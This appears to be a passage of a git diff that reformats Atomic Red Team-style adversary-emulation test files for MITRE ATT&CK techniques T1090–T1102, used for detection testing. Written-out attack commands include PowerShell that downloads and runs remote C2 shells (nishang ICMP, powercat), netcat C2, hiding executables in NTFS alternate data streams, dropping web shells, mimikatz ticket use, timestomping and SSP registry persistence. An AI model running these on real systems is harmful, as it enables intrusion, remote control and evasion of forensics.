+directly with the external proxy on the internet and then the proxy would forward communications to the C2 server. -Internal connection proxies can be used to consolidate internal connections from compromised systems. Adversaries may use a compromised internal system as a proxy in order to conceal the true destination of C2 traffic. The proxy can redirect traffic from compromised systems inside the network to an external C2 server making discovery of malicious traffic difficult. Additionally, the network can be used to relay information from one system to another in order to avoid broadcasting traffic to all systems.
+Internal connection proxies can be used to consolidate internal connections from compromised systems. Adversaries may +use a compromised internal system as a proxy in order to conceal the true destination of C2 traffic. The proxy can +redirect traffic from compromised systems inside the network to an external C2 server making discovery of malicious +traffic difficult. Additionally, the network can be used to relay information from one system to another in order to +avoid broadcasting traffic to all systems. ## Atomic Tests @@ -12,78 +22,66 @@ Internal connection proxies can be used to consolidate internal connections from - [Atomic Test #2 - portproxy reg key](#atomic-test-2---portproxy-reg-key) -
## Atomic Test #1 - Connection Proxy + Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080| | proxy_scheme | Protocol to proxy (http or https) | string | http| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh export #{proxy_scheme}_proxy=#{proxy_server} ``` #### Cleanup Commands: + ```sh unset http_proxy unset https_proxy ``` - - - -

## Atomic Test #2 - portproxy reg key -Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 + +Adds a registry key to set up a proxy on the endpoint at +HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 Upon execution there will be a new proxy entry in netsh netsh interface portproxy show all **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | listenport | Specifies the IPv4 port, by port number or service name, on which to listen. | string | 1337| | connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337| | connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress} ``` #### Cleanup Commands: + ```powershell netsh interface portproxy delete v4tov4 listenport=#{listenport} ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1093.md b/Atomic_Threat_Coverage/Triggers/T1093.md index f42f40ae..2c6d05ca 100644 --- a/Atomic_Threat_Coverage/Triggers/T1093.md +++ b/Atomic_Threat_Coverage/Triggers/T1093.md @@ -1,24 +1,24 @@ # T1093 - Process Hollowing + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1093) +
Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)
## Atomic Tests - [Atomic Test #1 - Process Hollowing using PowerShell](#atomic-test-1---process-hollowing-using-powershell) -
## Atomic Test #1 - Process Hollowing using PowerShell + This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_process_name | Name of the parent process | string | explorer| @@ -26,9 +26,7 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/ | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe| | spawnto_process_name | Name of the process to spawn | string | calc| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell . $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1 @@ -37,12 +35,9 @@ Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" - ``` #### Cleanup Commands: + ```powershell Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1095.md b/Atomic_Threat_Coverage/Triggers/T1095.md index f5a66b40..d73a3301 100644 --- a/Atomic_Threat_Coverage/Triggers/T1095.md +++ b/Atomic_Threat_Coverage/Triggers/T1095.md @@ -1,8 +1,12 @@ # T1095 - Standard Non-Application Layer Protocol + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1095) +
Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). -ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to +be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other +Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. ## Atomic Tests @@ -12,51 +16,41 @@ ICMP communication between hosts is one example. Because ICMP is part of the Int - [Atomic Test #3 - Powercat C2](#atomic-test-3---powercat-c2) -
## Atomic Test #1 - ICMP C2 -This will attempt to start C2 Session Using ICMP. For information on how to set up the listener + +This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/ **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address of the listening server | string | 127.0.0.1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1') Invoke-PowerShellIcmp -IPAddress #{server_ip} ``` - - - - -

## Atomic Test #2 - Netcat C2 + Start C2 Session Using Ncat -To start the listener on a Linux device, type the following: +To start the listener on a Linux device, type the following: nc -l -p **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address or domain name of the listening server | string | 127.0.0.1| @@ -64,24 +58,24 @@ nc -l -p | ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe| | ncat_path | The folder path of ncat.exe | path | $env:TEMP\T1095| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell cmd /c #{ncat_exe} #{server_ip} #{server_port} ``` - - - #### Dependencies: Run with `powerShell`! + ##### Description: ncat.exe must be available at specified location (#{ncat_exe}) + ##### Check Prereq Commands: + ```powerShell if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powerShell New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null $parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip" @@ -93,40 +87,29 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\ } ``` - - -

## Atomic Test #3 - Powercat C2 + Start C2 Session Using Powercat -To start the listener on a Linux device, type the following: +To start the listener on a Linux device, type the following: nc -l -p **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address or domain name of the listening server | string | 127.0.0.1| | server_port | The port for the C2 connection | integer | 80| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1') powercat -c #{server_ip} -p #{server_port} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1096.md b/Atomic_Threat_Coverage/Triggers/T1096.md index fae1565d..022524f8 100644 --- a/Atomic_Threat_Coverage/Triggers/T1096.md +++ b/Atomic_Threat_Coverage/Triggers/T1096.md @@ -1,8 +1,12 @@ # T1096 - NTFS File Attributes + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1096) +
Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) -Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)
+Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be +done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR +ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015) ## Atomic Tests @@ -10,10 +14,10 @@ Adversaries may store malicious data or binaries in file attribute metadata inst - [Atomic Test #2 - Store file in Alternate Data Stream (ADS)](#atomic-test-2---store-file-in-alternate-data-stream-ads) -
## Atomic Test #1 - Alternate Data Streams (ADS) + Execute from Alternate Streams [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) @@ -22,17 +26,13 @@ Execute from Alternate Streams **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of ADS file | path | c:\ADS\| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" @@ -47,33 +47,25 @@ expand \\webdav\folder\file.bat #{path}\file.txt:file.bat esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o ``` - - - - -

## Atomic Test #2 - Store file in Alternate Data Stream (ADS) + Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload_path | Path of file to hide in ADS | path | c:\windows\system32\cmd.exe| | ads_file_path | Path of file to create an ADS under | path | C:\Users\Public\Libraries\yanki\desktop.ini| | ads_name | Name of ADS | string | desktop.ini| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) { @@ -83,12 +75,9 @@ Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>, ``` #### Cleanup Commands: + ```powershell Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1097.md b/Atomic_Threat_Coverage/Triggers/T1097.md index 2785fca4..eb4cf673 100644 --- a/Atomic_Threat_Coverage/Triggers/T1097.md +++ b/Atomic_Threat_Coverage/Triggers/T1097.md @@ -1,45 +1,45 @@ # T1097 - Pass the Ticket + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1097) +
Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. -In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket) +In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured +by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket ( +TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, +whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the +user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket) -Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks) +Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate +tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: +ADSecurity AD Kerberos Attacks) -Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)
+Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which +enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014) ## Atomic Tests - [Atomic Test #1 - Mimikatz Kerberos Ticket Attack](#atomic-test-1---mimikatz-kerberos-ticket-attack) -
## Atomic Test #1 - Mimikatz Kerberos Ticket Attack + Similar to PTH, but attacking Kerberos **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | domain | domain | string | atomic.local| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd mimikatz # kerberos::ptt #{user_name}@#{domain} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1098.md b/Atomic_Threat_Coverage/Triggers/T1098.md index 60057fc2..e9da869e 100644 --- a/Atomic_Threat_Coverage/Triggers/T1098.md +++ b/Atomic_Threat_Coverage/Triggers/T1098.md @@ -1,37 +1,43 @@ # T1098 - Account Manipulation + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098) +
Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. ### Exchange Email Account Takeover -The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission) This command can be run, given adequate permissions, to further access granted to certain user accounts. This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) +The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office +365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission) This command can be run, given adequate +permissions, to further access granted to certain user accounts. This may be used in persistent threat incidents as well +as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish +to compromise. This may further enable use of additional techniques for gaining access to systems. For example, +compromised business accounts are often used to send messages to other accounts in the network of the target business +while creating inbox rules so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending +O365 - 2019) ### Azure AD -In Azure, an adversary can set a second password for Service Principals, facilitating persistence.(Citation: Blue Cloud of Death) +In Azure, an adversary can set a second password for Service Principals, facilitating persistence.(Citation: Blue Cloud +of Death) ### AWS -AWS policies allow trust between accounts by simply identifying the account name. It is then up to the trusted account to only allow the correct roles to have access.(Citation: Summit Route Advanced AWS policy auditing)
+AWS policies allow trust between accounts by simply identifying the account name. It is then up to the trusted account +to only allow the correct roles to have access.(Citation: Summit Route Advanced AWS policy auditing) ## Atomic Tests - [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate) -
## Atomic Test #1 - Admin Account Manipulate + Manipulate Admin Account Name **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $x = Get-Random -Minimum 2 -Maximum 9999 @@ -52,9 +58,4 @@ foreach($member in $fmm) { } ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1099.md b/Atomic_Threat_Coverage/Triggers/T1099.md index 51d15941..9db81ce5 100644 --- a/Atomic_Threat_Coverage/Triggers/T1099.md +++ b/Atomic_Threat_Coverage/Triggers/T1099.md @@ -1,5 +1,7 @@ # T1099 - Timestomp + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1099) +
Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)
## Atomic Tests @@ -18,68 +20,52 @@ - [Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell](#atomic-test-7---windows---modify-file-last-access-timestamp-with-powershell) -
## Atomic Test #1 - Set a file's access timestamp + Stomps on the access timestamp of a file **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh touch -a -t 197001010000.00 #{target_filename} ``` - - - - -

## Atomic Test #2 - Set a file's modification timestamp + Stomps on the modification timestamp of a file **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh touch -m -t 197001010000.00 #{target_filename} ``` - - - - -

## Atomic Test #3 - Set a file's creation timestamp + Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. @@ -87,17 +73,13 @@ Sudo or root privileges are required to change date. Use with caution. **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh NOW=$(date) @@ -107,185 +89,169 @@ date -s "$NOW" stat #{target_filename} ``` - - - - -

## Atomic Test #4 - Modify file timestamps using reference file + Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh| | target_file_path | Path of file to modify timestamps of | Path | /opt/filename| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh touch -acmr #{reference_file_path} #{target_file_path} ``` - - - - -

## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell + Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. -To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970. +To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year +1970. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path of file to change creation timestamp | Path | $env:TEMP\T1099_timestomp.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } ``` #### Cleanup Commands: + ```powershell Remove-Item #{file_path} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: A file must exist at the path (#{file_path}) to change the creation time on + ##### Check Prereq Commands: + ```powershell if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null ``` - - -

## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell + Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. -To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970. +To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year +1970. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path of file to change modified timestamp | Path | $env:TEMP\T1099_timestomp.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } ``` #### Cleanup Commands: + ```powershell Remove-Item #{file_path} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: A file must exist at the path (#{file_path}) to change the modified time on + ##### Check Prereq Commands: + ```powershell if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null ``` - - -

## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell + Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. -To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970. +To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year +1970. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path of file to change last access timestamp | Path | $env:TEMP\T1099_timestomp.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } ``` #### Cleanup Commands: + ```powershell Remove-Item #{file_path} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: A file must exist at the path (#{file_path}) to change the last access time on + ##### Check Prereq Commands: + ```powershell if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1100.md b/Atomic_Threat_Coverage/Triggers/T1100.md index e19e7b50..64e04b52 100644 --- a/Atomic_Threat_Coverage/Triggers/T1100.md +++ b/Atomic_Threat_Coverage/Triggers/T1100.md @@ -1,54 +1,57 @@ # T1100 - Web Shell + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1100) +
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013) -Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
+Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in +case an adversary's primary access methods are detected and removed. ## Atomic Tests - [Atomic Test #1 - Web Shell Written to Disk](#atomic-test-1---web-shell-written-to-disk) -
## Atomic Test #1 - Web Shell Written to Disk + This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot| | web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1100\src\| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd xcopy #{web_shells} #{web_shell_path} ``` #### Cleanup Commands: + ```cmd del #{web_shell_path} >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Web shell must exist on disk at specified location (#{web_shells}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{web_shells}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -56,7 +59,4 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1101.md b/Atomic_Threat_Coverage/Triggers/T1101.md index 7739bfc4..d842090c 100644 --- a/Atomic_Threat_Coverage/Triggers/T1101.md +++ b/Atomic_Threat_Coverage/Triggers/T1101.md @@ -1,5 +1,7 @@ # T1101 - Security Support Provider + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1101) +
Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)
@@ -7,24 +9,20 @@ - [Atomic Test #1 - Modify SSP configuration in registry](#atomic-test-1---modify-ssp-configuration-in-registry) -
## Atomic Test #1 - Modify SSP configuration in registry + Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell # run these in sequence @@ -37,9 +35,4 @@ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Pack Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1102.md b/Atomic_Threat_Coverage/Triggers/T1102.md index 3b425e71..2a11100c 100644 --- a/Atomic_Threat_Coverage/Triggers/T1102.md +++ b/Atomic_Threat_Coverage/Triggers/T1102.md @@ -1,12 +1,20 @@ # T1102 - Web Service + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1102) +
Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system. -These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. +These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known +as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once +infected, victims will reach out to and be redirected by these resolvers. -Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. +Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the +likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, +such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service +providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. -Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
+Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while +also enabling operational resiliency (since this infrastructure may be dynamically changed). ## Atomic Tests @@ -14,48 +22,36 @@ Use of Web services may also protect back-end C2 infrastructure from discovery t - [Atomic Test #2 - Reach out to C2 Pointer URLs via powershell](#atomic-test-2---reach-out-to-c2-pointer-urls-via-powershell) -
